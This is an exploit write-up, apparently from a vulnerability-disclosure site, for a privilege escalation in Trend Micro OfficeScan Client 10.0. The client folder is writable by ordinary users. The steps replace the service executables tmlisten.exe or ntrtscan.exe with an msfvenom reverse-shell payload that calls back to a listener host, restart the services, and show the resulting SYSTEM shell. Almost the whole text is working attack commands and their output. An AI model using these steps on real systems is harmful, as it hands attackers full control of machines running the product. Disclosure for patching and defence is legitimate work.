Trend Micro OfficeScan Client 10.0 ACL Service LPE

2023.06.02
Credit: msd0pe
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE # Date: 2023/05/04 # Exploit Author: msd0pe # Vendor Homepage: https://www.trendmicro.com # My Github: https://github.com/msd0pe-1 Trend Micro OfficeScan Client: Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access. [1] Verify the folder rights: > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client" C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F) NT SERVICE\TrustedInstaller:(CI)(IO)(F) NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) BUILTIN\Administrators:(F) BUILTIN\Administrators:(OI)(CI)(IO)(F) BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) CREATOR OWNER:(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO) [2] Get informations about the services: > sc qc tmlisten [SC] QueryServiceConfig SUCCESS SERVICE_NAME: tmlisten TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT Listener DEPENDENCIES : Netman : WinMgmt SERVICE_START_NAME : LocalSystem OR > sc qc ntrtscan SERVICE_NAME: ntrtscan TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT RealTime Scan DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe OR > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe [4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop tmlisten > sc start tmlisten OR > sc stop ntrtscan > sc start ntrtscan OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top